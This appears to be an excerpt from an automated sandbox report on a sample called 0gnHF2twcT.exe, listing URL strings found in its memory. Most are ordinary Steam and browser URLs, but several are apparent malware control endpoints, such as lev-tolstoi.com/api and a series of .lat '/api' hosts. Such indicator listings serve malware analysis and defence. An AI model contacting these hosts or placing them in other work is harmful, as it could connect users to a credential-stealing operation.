                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crosshuaht.lat
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.stfc3
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1530034448.00000000009FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/C
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/Uf
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apickc6
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apivZ
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/q6_e
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apin.txtPK
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steamp&c
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat:443/apigl
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/7656119972433190066U
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.ste
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steamp
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampow
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscri
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.comm
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api%l
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcVcc
